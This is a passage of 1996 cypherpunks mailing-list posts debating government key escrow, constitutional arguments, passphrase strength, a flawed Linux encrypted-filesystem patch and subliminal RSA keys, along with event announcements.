Subject: Re: CDT Policy Post 2.27 - No New News on Crypto: Gore Restates
In-Reply-To: <1.5.4.32.19960715151942.002d643c@giasdl01.vsnl.net.in>
Message-ID: <v03007603ae102b387840@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:26 AM -0700 7/15/96, Arun Mehta wrote:
>At 10:17 14/07/96 -0700, David Sternlight wrote:
>>At 7:05 AM -0700 7/13/96, Deranged Mutant wrote:
>>>On 12 Jul 96 at 18:23, Bob Palacios posted:
>>>> *  Called for the liberalization of export controls provided computer
>>>>    users participate in a "global key management infrastructure"
>>>>    designed to make personal encryption keys accessible to law
>>>>    enforcement.
>>>
>>>This is particularly problematic...
>
>>Your best shot would be to make sure the part about the system being
>>voluntary was hard-wired into any legislation or rule-making. Unless and
>>until ITAR is modified by Congress, the USG has what Mark Twain called "the
>>calm confidence of a Christian with four aces" on this matter.
>
>International agreement on this issue won't happen this century.
>People don't understand the problem (or why it needs regulation),
>are suspicious of the US and its motives -- in any case
>international negotiations take forever.

That's certainly one view. Another is that if you watch the precursors of
legislation, then actions in the Netherlands, the UK, and in the European
Parliament suggest that an independent European escrow initiative might
happen within a year. When it does it will be a trivial matter to harmonize
it with some US offering. The mills in various countries are grinding too
coincidentally for my taste.

Given the glacial pace with which standard integrated crypto has appeared
on the Internet, with Navigator only going to offer the final
link--encrypted e-mail--later this year, the above timing isn't necessarily
one which will be left behind by independent Internet developments. And
given the glacial pace of PGP movement toward integrated internet standard
products, it hasn't a hope of beating the above timing to the punch.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Tue, 16 Jul 1996 08:16:12 +0800
To: cypherpunks@toad.com
Subject: Re: Markoff on Clipper III
In-Reply-To: <2.2.32.19960715105048.0082a620@panix.com>
Message-ID: <v03007604ae102ddc1759@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:50 AM -0700 7/15/96, Duncan Frissell wrote:
>At 09:35 PM 7/14/96 -0700, David Sternlight wrote:
>
>>Did you miss the part in the Constitution about "provide for the common
>>defence"
>
>That's a meaningless part of the Preamble.

Anyone who thinks substantive parts of the Preamble are "meaningless" is
deserving only of contumely. Perhaps you should review your high school
civics course--you did have one of those, yes?

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 16 Jul 1996 09:16:46 +0800
To: David Sternlight <cypherpunks@toad.com
Subject: Re: Markoff on Clipper III
Message-ID: <199607151725.KAA02150@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:35 PM 7/14/96 -0700, David Sternlight wrote:
>>At 02:33 PM 7/14/96 -0400, Duncan Frissell wrote:
>>>Last time I looked, the oath they took was to protect the Constitution --
>>>not the nation or national security.
>
>Did you miss the part in the Constitution about "provide for the common
>defence" 

If there is anything that is clear about GAK, it is a system which is NOT 
intended to benefit all citizens approximately equally.  The vast majority 
(over 99.99%) of the population will never be the victim of any sort of 
terrorism.  If anything, it's intended to provide job security for 
government employees who are increasingly aware that the unhappy villagers 
will be showing up at the castle with their torches.

The best thing the government could do to prevent terrorism is to simply 
stop misbehaving; to stop doing those things that make many ordinary 
citizens feel that they are far more a victim of their government that any 
terrorist or criminal.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Tue, 16 Jul 1996 13:43:41 +0800
To: cypherpunks@toad.com
Subject: Re: Word lists for passphrases
In-Reply-To: <199607150749.AAA07579@toad.com>
Message-ID: <v03007605ae102f6372e6@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:45 AM -0700 7/15/96, Bill Stewart wrote:
>At 09:43 PM 7/8/96 -0700, you wrote:
>>If the purpose is for use with "Crack" or some similar program, it might be
>>better than you would think.  You won't get the "unusual" words, but you
>>will also get the words in common usage that do not appear in dictionaries.
>>(Such as fnord, jedi, killfile, and the like...)
>
>"fnord" is in _my_ dictionary - can't you find it in yours?  :-)
>
>
>
>>Another thing to look for when choosing dictionaries/wordlists for crack is
>>not sticking to english.  If you have a userbase that is known to have a
>>certain percentage of people of a non-english background, you will want to
>>find lists of words from that background.  (I had a sysadmin asking me about
>>Yiddish and Hebrew wordlists for just that reason.)  These can be a bit
>>harder.  (Especially for unusual languages.)
>
>Grady Ward has his Moby Words databases with some of this kind of information.
>In addition to the usual sets of languages, it's useful to include any
>available lexicons of Elvish, Klingon, Unix, and other popular
>hacker-languages,

It is pretty easy to defend against dictionary attacks by using an expanded
character set--mixed caps and lower case; numbers substituted for some
letters according to easily-remembered personal rules.

"Da5id" in "Snow Crash" by Neal Stephenson is an obvious example, since the
"v" is a roman numeral 5. Another is the "Compuserve method" of inserting
punctuation characters between words making up a password or key. Since the
length of the words used is unknown to the cracker, this makes his job
harder.

That is--a dictionary which accomodates such things as the above will be
pretty large. With the number rule, there would have to be 10 additional
versions of the one-letter word, 10 versions of each leading character
making up a two letter word, and then it starts increasing combinatorially.
Might as well use brute force.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 16 Jul 1996 10:59:31 +0800
To: tcmay@got.net (Timothy C. May)
Subject: brokers as middlemen
In-Reply-To: <ae0fbf7b0602100466fc@[205.199.118.202]>
Message-ID: <199607151748.KAA25534@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



TCM:
>
>I'm watching a CNBC report about the NASDAQ market and proposed fixes to
>certain alleged abuses about stock recommendations, bid-ask spreads,
>brokers, etc.
>
One of the "industry" proposals involving taping the phone calls of NASDAQ
>brokers. (The proposal: 10% of all calls to customers would be recorded for
>later review.)

this reminds me of something else. the stock exchange as it now stands
is not the paradigm of true capitalism as some would have others 
believe. in fact I see it as the paradigm of what might be called
"middleman capitalism", a version of capitalism that is rapidly
diminishing and disappearing in the onslaught of the information age.

essentially, in the new version of capitalism, middlemen who do not
*add*value* to the delivery of a product are going to be increasingly
cut out of the loop. I am not saying *all* middlemen will be cut out,
but many that now exist will be.

in my opinion, the *stock*broker* as his job is now defined is in many
ways the classic middleman that does not necessarily add value to the
information that flows through his hands. if he is just an agent for
carrying out the demands of clients, then I'd say that this role is
going to disappear as markets become more automated, or rather capital
moves toward stock exchanges that diminish this overhead. however, there
are many brokers that add far many more services than mere 
blind investor response, such as analyzing company profitability,
forecasting, etc-- these are adding value imho.

I think the end result of the information age is going to be something
that could be regarded as the ultimate capitalist market-- something
that eliminates all "unnecessary" middlemen. I suspect the stock exchanges
of the future will *not* be regulated because they *cannot* be. it
will be a matter of buyers and sellers choosing the systems that
best suit them regardless of what governments feel is appropriate, fair,
or whatever.

its interesting how the restrictions on stock buying and selling are
becoming quite orwellian in the way they are designed to limit
mere information transfer in many cases, it seems. TCM has written
about this far better than I could in previous posts. ("inside trading"
restrictions).

I think we are going to be moving toward new stock markets that
are diverse (i.e. not only one of them) that have different kinds of
rules for buying and selling. I suspect they will be largely automated,
because the market pressure is to move in the direction of eliminating
unnecessary overhead. isn't a roomful of men chaotically 
screaming "buy" and "sell" orders at each other the epitome of 
what is *not* represented by the information age? the entire process
could be reduced to electrons flowing through wires.

so I think what we are seeing are the last gasps of pre-information-age
economics in which governments feel they have to do things like regulate
stock markets for the concept of buying and selling to work right and
be "fair". I'm not saying that unfairness doesn't exist in capitalism,
but I am saying that increasingly these  decisions of what actually
constitutes "unfairness" are going to be made by the economic players
involved and not bureacrats in governments.

eventually we are going to find that money is actually
a special kind of information
network that helps a society control the allocation of capital and
human resources-- i.e., allocating anything with the property of 
"scarcity".

(for more ideas on "middleman capitalism" vs. "pure captalism" read
Bill Gates' _Road_Ahead_.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geeman@shellx.best.com
Date: Tue, 16 Jul 1996 19:45:15 +0800
To: cypherpunks@toad.com
Subject: RE: (fwd) krypt13i.zip Enkryptonator: Homonymous key encryption system, R. Newton
Message-ID: <Chameleon.960715114733.geeman@geeman.vip.best.com.best.com>
MIME-Version: 1.0
Content-Type: text/plain


And all those fools like Diffie and Rivest, Shamir, Adelman, etc, well I guess they 
missed the boat big time by missing this, huh?

Hint: misplaced commas, are always a tipoff to, uhhhhh ... less than stellar shall we 
say, intellectual bona fides.

Boy I'm sure glad I don't have to remember those orney key anymore!

: Enkryptonator is a newly developed encryption system based on the
: principles of homonymous key cryptography invented by Enkryptonator Co.
: Homonymous key systems are an exiciting, new breakthrough, that solve
: the 'key management' problem without resorting to 'public key'
: cryptography. No more unwieldy, impossible to remember, binary keys.
: Enkryptonator is easy to use.  Because of Enkryptonator's unique design
: no one who intercepts your encryption in an unauthorized manner can
: decrypt your file -- even if he knows the key of encryption! Everyone
: has a right to privacy and Enkryptonator will provide you a means of
: securing your personal and private concerns from unwanted intruders.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Tue, 16 Jul 1996 12:31:48 +0800
To: cypherpunks@toad.com
Subject: WashPost: A "hate speech" horseman of a different color
Message-ID: <Pine.GUL.3.94.960715113050.12577A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Search July 15th www.washingtonpost.com for "massive armamentarium" [sic].

With Innovative Use, the Web Empowers the First Amendment

By John Schwartz 
Washington Post Staff Writer 
Monday, July 15 1996; Page F19
The Washington Post

[...]
Lately, though, I've gotten a nice, big dose of hope from watching 
hatemongers on the Net as they duke it out with the truth-squaders. In 
any intellectual combat, those who can support their arguments with 
facts are better armed. And guess what? The Internet gives us a new kind 
of arsenal.

That might go against what you've been reading. A lot of journalists are 
discovering "hate speech" on the Internet -- racism, antisemitism, the 
whole vile package. It's the cover story for the current issue of 
Emerge, with the arresting image of a mouse cord tied in a noose. Such 
groups as the Simon Wiesenthal Center in California try to persuade 
publications to run stories on this loathsome trend, and they urge 
governments to drive those who spread messages of hate off the Net.
[...]
The on-line guest book at Nizkor is an evolving testament to the power 
of free speech. One visitor wrote:

"As the child of survivors of the Holocaust I am particularly dismayed 
when intelligent and reasonable people are influenced by revisionist 
pap. I'm often frustrated to the point where I'd sooner tolerate 
censorship than the promulgation of neo-Nazi lies. Your work restores my 
faith in reasoned debate and the drive of honest people to find and 
spread the truth."

Memo to the Founders: Thanks, guys. You got it right.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMeqQV5NcNyVVy0jxAQF8vAIAlGyi91nOxj1qhRN7GPXcChO9FOraJSc1
h/WyEC01HJj/W5uj51AxZbJIHjkz/eCcMb2AmjclfGeKIThrsSoY9A==
=Olej
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 16 Jul 1996 12:23:52 +0800
To: Raph Levien <tcmay@got.net>
Subject: Re: How I Would Ban Strong Crypto in the U.S.
Message-ID: <199607151850.LAA08307@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:58 AM 7/15/96 -0400, Raph Levien wrote:
>4. Thus, the best leverage for the TLAs to win is to guide the 
>development of a key management infrastructure with the following 
>property: if you don't register your key, you can't play. I believe that 
>this is the true meaning of the word "voluntary:" you're free to make 
>the choice not to participate.
>
>5. This is _important_. If you can't get the keys for your 
>correspondents, you can't use encryption. If they build a key management 
>infrastructure that actually works, people will use it.

The obvious counter is to use the key management infrastructure for
authentication, but use a technique like Diffie-Hellman to decide on a
session key.  I see two problems with this approach:

(1) It still allows traffic analysis.
(2) It will be difficult to implement for one-way transmissions (e.g. email).

A more complex structure would overcome (2) above.  Use you GAK key to sign
your PGP key.  Post your PGP key on the MIT server (or successors), and
people who want non-GAKed communication with you would use your PGP key,
with the benefit of government approved authentication.

I still think this whole GAK thing is going to fail on the, "Which
government?" question.  I don't see either multi-nationals or their
governments wanting to share their secrets with each other, and I don't see
how to set up universal GAK to prevent that form of industrial espionage. 
Also, the key which decodes the GAKed data is just too valuable and too
easy to steal.


-------------------------------------------------------------------------
Bill Frantz       | The Internet may fairly be | Periwinkle -- Consulting
(408)356-8506     | regarded as a never-ending | 16345 Englewood Ave.
frantz@netcom.com | worldwide conversation.    | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 16 Jul 1996 07:50:20 +0800
To: cypherpunks@toad.com
Subject: DCSB: Betting on the Future
Message-ID: <v03007621ae101d1c019f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: rah@tiac.net
Mime-Version: 1.0
Date: Mon, 15 Jul 1996 11:26:33 -0400
To: dcsb@ai.mit.edu
From: Robert Hettinga <rah@shipwright.com>
Subject: DCSB: Betting on the Future
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Robert Hettinga <rah@shipwright.com>

-----BEGIN PGP SIGNED MESSAGE-----



                 The Digital Commerce Society of Boston

                               Presents

                             Duane Hewitt
                             Idea Futures

                       "Betting on the Future"


                        Tuesday, August 6, 1996
                               12 - 2 PM
                   The Downtown Harvard Club of Boston
                     One Federal Street, Boston, MA


Duane says:

> I am a Molecular Biologist by trade but I am fascinated by all aspects of
> science and technology and especially their long term ramifications. I am
> completing my Master's Degree thesis as well as working full time at the
> University of Massachusetts at Amherst. I have some part time work
> maintaining Web pages and I have been involved with the Idea Futures Web
> site from the very beginning. I also am currently working on a hypertext
> reference on the biology of aging. Many of these interest can be accessed
> from my home page at http://www.lucifer.com/~duane
>
> I will introduce the concept of Idea Futures which is a market in which
> the odds of future events are set by betting. It is designed to reward
> those who can accurately forecast future outcomes. It has been recognized
> by the Austrian Broadcast System, and the Point Survey and mentioned in
> _Wired_. I will discuss the implications of such a market as well as some
> of the history behind it. I will also propose how a similar market could
> be used to construct a market based voting system.



This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, August 6, 1996 from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, One Federal Street. The price for lunch is $27.50.
This price includes lunch, room rental, and the speaker's lunch. ;-).  The
Harvard Club *does* have dress code: jackets and ties for men, and
"appropriate business attire" for women.

We need to receive a company check, or money order, (or if we *really* know
you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, August 3, or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be sent
back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston".

If anyone has questions, or has a problem with these arrangements (We've had
to work with glacial A/P departments more than once, for instance), please
let us know via e-mail, and we'll see if we can work something out.

Planned speakers for the following few months are:

 September   Tatsuo Tanaka    Some Economics of Digital Cash
 October     Philippe LeRoux  Stock Exchanges and the Web

We are actively searching for future speakers.  If you are in Boston on the
first Tuesday of the month, and you would like to make a presentation to the
Society, please send e-mail to the DCSB Program Commmittee, care of Robert
Hettinga, rah@shipwright.com .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to majordomo@ai.mit.edu .  If you want
to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a
message to majordomo@ai.mit.edu .

Looking forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMepi6vgyLN8bw6ZVAQFsOwP/UuOoWa0LUEyY4dmQ21KIR4GwhB6PurSa
L97eVsbVOigP+TVPFJX7RKqYhCxIL8gDUnSRimGnATmhLo5wdE0UXvgakeGaD5s+
vKPfhuaG9/MnuZvWFbBEZOrTTKqVE8bfoU2yiw6xTvhyQY0lDA2BSO8vjip28nOA
0Wkuh1VUBhY=
=/5+9
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb
Or, to subscribe,           write:  subscribe dcsb
If you have questions, write to me at Owner-DCSB@ai.mit.edu

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Tue, 16 Jul 1996 15:54:45 +0800
To: cypherpunks@toad.com
Subject: US versions of Netscape now available
Message-ID: <31EA98B6.446B@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


The US versions of Netscape Navigator 3.0 beta 5 and FastTrack Server
2.0 are now available for download.  Obviously, this is only available
to US citizens or permanent residents.  You can get it from
http://wwwus/eng/US-Current/

There's only one machine serving this stuff right now, so please be
patient if it's slow or you have a hard time connecting.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 16 Jul 1996 16:53:42 +0800
To: cypherpunks@toad.com
Subject: Re: How I Would Ban Strong Crypto in the U.S.
In-Reply-To: <ae0efb9f020210046227@[205.199.118.202]>
Message-ID: <199607151920.MAA08142@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Raph Levien <s_levien@research.att.com> writes:
>4. Thus, the best leverage for the TLAs to win is to guide the 
>development of a key management infrastructure with the following 
>property: if you don't register your key, you can't play. I believe that 
>this is the true meaning of the word "voluntary:" you're free to make 
>the choice not to participate.

>5. This is _important_. If you can't get the keys for your 
>correspondents, you can't use encryption. If they build a key management 
>infrastructure that actually works, people will use it.

There has been some discussion at the last couple of crypto conferences
about possible ways around this plan.  (I guess the idea goes back at
least a year or two.)

One idea is to register a 2048 bit public key.  You have to give the
secret key to the government in order to use the registry.  But what you
do is to create a second key and embed it in the first.  It is, say, a
1024 bit key which is the lower half of the 2048 bit key.  It has
different secret factors that nobody but you knows.  Then when people
send you messages they encrypt using this modulus rather than the
official one.

You get the benefit of the government-sponsored key certificate
infrastructure, but the government is not able to crack your
communications.

The discussion at the crypto conferences has centered on how to design
key systems which don't have this "subliminal key" property, where it is
impossible to create pairs of keys such that publishing one reveals the
other.  I think they were looking at some of the discrete log systems
since in RSA it is pretty easy to do what I have described above.  You
just create the 1024 bit key first, at random, then choose the 2048 bit
key so its modulus matches the 1024 bit key in its low bits.  This is the
same basic method as the so-called "dead beef" attacks against PGP key
ID's which were published earlier this year.

So it will be interesting to see whether any government sponsored PK
infrastructure takes care to avoid subliminal keys.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cynthia Deno <cynthia@usenix.ORG>
Date: Tue, 16 Jul 1996 16:59:39 +0800
To: cypherpunks@toad.com
Subject: Practical Solutions at USENIX SECURITY Symposium
Message-ID: <199607151926.MAA00283@usenix.ORG>
MIME-Version: 1.0
Content-Type: text/plain



The 6th USENIX Security Symposium - Focusing on Applications of Cryptography -
is coming to San Jose.  You may want to attend.

July 22-July 25, 1996
6TH USENIX SECURITY SYMPOSIUM
Fairmont Hotel, San Jose, California
Sponsored by the USENIX Association
Co-sponsored by UniForum in cooperation with the Computer Emergency Response
Team 

There will be refereed papers, panel presentations, invited talks,
Birds-of-a-Feather sessions, and an informal Vendor Display.  The symposium is
offering two days of tutorials.  Tutorial speakers include Ed DeHard, CERT; Dan
Geer, Open Market; Jon Rochlis, BBN Planet; Marcus Ranum, V-One; Matt Bishop, UC
Davis; and Bruce Schneier, Counterpane Systems.  

Practical solutions to UNIX security will be dissected, debated, and refined.
New research on public key issues, electronic commerce, safe working areas, and
secure communication.  There will also be sessions on the latest version of
Pretty Good Privacy (PGP), Internet Firewalls, and the C2Net Privacy model.
Tutorial topics include:  Implementing Cryptography; World Wide Web and Internet
Security; Comparison of UNIX Security Tools; and Security for Software
Developers.

UniForum has organized a track especially for managers.  It offers a
comprehensive overview of computer security as it relates to open systems from a
manager's perspective.  The UniForum panel sessions cover:  Security and
Privacy; Electronic Commerce; Cryptography Infrastructure; and Cryptography and
the Law.

Admission is free and open to the public for the small, table-top Vendor Display
taking place Wednesday July 24, Noon - 2:00 pm and 3:00 - 7:00 pm in the
Fairmont Hotel.  Call Cynthia Deno 408 335 9445.

Complete program and registration information is available on the USENIX home
page on the Web at http://www. usenix.orgemail or email to info@usenix.org
(state "send security conference" in body of your message).


/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-
| Cynthia Deno            |                           USENIX
|
| Tel: 408 335 9445    |  The UNIX and Advanced Computing Systems |
| Fax: 408 335 5327   |        Technical and Professional Association     |
| cynthia@USENIX.org |
|
| Check out USENIX on the Net..........http://www.USENIX.org                |
/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-/-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 16 Jul 1996 07:59:38 +0800
To: Eric Murray <ericm@lne.com>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <199607121854.LAA29560@slack.lne.com>
Message-ID: <199607151636.MAA04446@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Murray writes:
> When I called the Pac Bell customer service droids to get my "complete"
> blocking I asked them why they won't block CID to 800 numbers.
> Their answer: "that's just the way it works". 

There is a really easy reason for this.

When you call an 800 number, the other guy gets billed. The person
that gets billed has a legal right to know the call details of a toll
call they are paying for. If you don't want them to know where you are
calling from, don't ask them to pay for it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Tue, 16 Jul 1996 15:11:17 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: Markoff on Clipper III
In-Reply-To: <2.2.32.19960715184219.00827588@panix.com>
Message-ID: <v03007603ae104e6ebc38@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:42 AM -0700 7/15/96, Duncan Frissell wrote:
>At 10:20 AM 7/15/96 -0700, David Sternlight wrote:
>>At 3:50 AM -0700 7/15/96, Duncan Frissell wrote:
>>>At 09:35 PM 7/14/96 -0700, David Sternlight wrote:
>>>
>>>>Did you miss the part in the Constitution about "provide for the common
>>>>defence"
>>>
>>>That's a meaningless part of the Preamble.
>>
>>Anyone who thinks substantive parts of the Preamble are "meaningless" is
>>deserving only of contumely. Perhaps you should review your high school
>>civics course--you did have one of those, yes?
>>
>>David
>>
>
>Welcome to the list.
>
>Yes my high school Civics class was good.  So were my law school Con Law
>courses.
>
>Yes, David I would say you practice "contumely" -- Rudeness or contempt
>arising from arrogance; insolence.  But then so do I.
>
>I'll say again, the Preamble speaks of the reasons the drafters of the
>Constitution had for writing the thing, it does not set forth any powers of
>the federal government.  Goals not means.  GAK is a means not a goal.

Now that is a more useful and accurate statement than that substantive
parts of the Preamble are "meaningless". As you must know from your Con Law
classes, legislative intent is an important element of many Supreme Court
decisions, and the Preamble is certainly as crisp and classical a statement
of legislative intent as one can find.

The specific point, of course, wasn't GAK but the silly dispute by one of
our beloved nit-pickers of the assertion that the President took an oath to
protect national security. By inclusion in his oath to defend the
Constitution, given the bits I cited, he effectively did.

Best;
David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Tue, 16 Jul 1996 12:24:41 +0800
To: Simon Spero <tcmay@got.net>
Subject: Re: Clueless "Attachment converted" uses
In-Reply-To: <ae0f1d14030210043edc@[205.199.118.202]>
Message-ID: <v03007604ae10503d28f6@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:01 AM -0700 7/15/96, Simon Spero wrote:
>On a very similar note - could people who are using clear-text PGP
>signatures with mime use text/... instead of application/...; that way
>people without pgp will see the message text without having to mess with
>their mailcaps (that's the way text/* is supposed to work)

It's kludgy, I agree, but that's the way the example PGP translator for our
mailer that some of us are using works right now. If someone rewrites that
part of it, I'm sure we'd all be happy to switch. Dunno if there's an easy
patch with ResEdit. (It's for the Mac.)

In my own case I used it to clearsign my first few posts here to avoid
somebody popping up and claiming a spoof. I don't plan to do it regularly.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Tue, 16 Jul 1996 18:23:19 +0800
To: cypherpunks@toad.com
Subject: Re: DES & IDEA built right into the Linux kernel...
In-Reply-To: <m0ue5GK-000HE6C@hackvan.com>
Message-ID: <4se8do$dlp@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199607130507.WAA25103@myriad>,
Anonymous <nobody@mockingbird.alias.net> wrote:
>> Nicholas Leon <nicholas@binary9.net> has created tools that allow DES
>> and IDEA encryption at the device level for the Linux kernel.  Some of
>> the patches are in the 2.0.4 kernel, and the rest can be found at
>>
>>     http://www.binary9.net/nicholas/linuxkernel/patches/
>
>
>Yep, you can mount encrypted files or partitions as filesystems. (sorta
>like securedrive/securedevice for messydos.)  Nifty stuff...

Except that last I checked (2.0.6) it was completely insecure.  The
DES-encrypted filesystem ignored your password and always used a key of
all 0's (which is a weak key in DES, to boot).  I've been touching it up
to do DES and IDEA _right_ (CBC mode within each block, IV based on block
number), and plan to put in some simple stego as well.

   - Ian

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMeqk5EZRiTErSPb1AQEbdwQAl/ZyhK+ZczFnfUFm9wVNGAq9MBSGNmZc
t1xS2G6urjit3IvHn0ZYSCzkwUj00Hun4FLdFkp0i45M2PWGSJMZtr/Mx7Xua9yr
2uw1p3bN1iId8JrQOGuo1aCTm8rTUh30OW2cL+jPM+RBWgLGg9YcBUQzO7OLoqeM
xpROxmPL8CI=
=pezJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 16 Jul 1996 09:29:54 +0800
To: cypherpunks@toad.com
Subject: Re: Markoff on Clipper III
In-Reply-To: <v03007600ae0f78a7bd80@[192.187.162.15]>
Message-ID: <Pine.LNX.3.94.960715132555.165B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 14 Jul 1996, David Sternlight wrote:

> Did you miss the part in the Constitution about "provide for the common
> defence" and about the President's associated responsibility to "take care
> that the laws be faithfully executed"?
> 
> And what oath do you suppose binds him because "The President shall be
> commander in chief of the army and navy of the United States"?

Nowhere in the Constitution does it say that firearms (or crypto in this case)
are a threat to national security.  In fact, the second amendment explicitly
dictates that people have the right to own firearms.  The term "national
security" has been used too often to justify the government's actions.
National security means making sure that terrorists don't find out the ICBM
lauch codes, not making it illegal for people to use unescrowed encryption.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMeqANrZc+sv5siulAQGE6AP/QeF+z2oIK8t6Ri5AYMdi4uiw2XiIRgnn
MEpYxQPpaA6m7jXCLx9/06xE4S+TCGkvTbjciEIQPBEhIQ0j7gqBgY5F+T6zSMOZ
8cTNqyYm2NyEkC4vWgaXe8zPf47eEmlaZbxT1tpkCWiVROV96u7i1ldcEjBbIr6e
lhWt1bwg778=
=RErS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Tue, 16 Jul 1996 21:02:54 +0800
To: cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.27 - No New News on Crypto: Gore Restates
In-Reply-To: <199607151701.KAA00537@mail.pacifier.com>
Message-ID: <v03007600ae1053f60923@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Some live in the conversation in their head and require that everything be
spelled out. Very well, then:

At 10:58 AM -0700 7/15/96, jim bell wrote:
>At 06:05 PM 7/14/96 -0700, David Sternlight wrote:
>
>>This post is a courtesy to others who may have been expecting more.
>
>It's not that we're expecting more...it's just that we're hoping for
BETTER.

"More" in the sense of a response to your personal attacks.

>
>>It's a
>>one-time statement to this list, which I've just joined, of my current
>>practice: Silence does not constitute assent.
>>David
>

>Well, that's where you're confused.  Our positions are not morally
>equivalent.

Morality has nothing to do with it. The instant dispute is over facts. And
you have no idea what my position on GAK is, judging from your personal
attacks. I'll help you out. I do not object to it domestically as long as it
is voluntary, that restriction is hard-coded into the rules and laws, and
there are real choices at least initially. ("Trust everyone and always cut
the cards.") Whether I then use it or not is my business, though it's no
secret that I'd use a non-GAK system in preference were it available and an
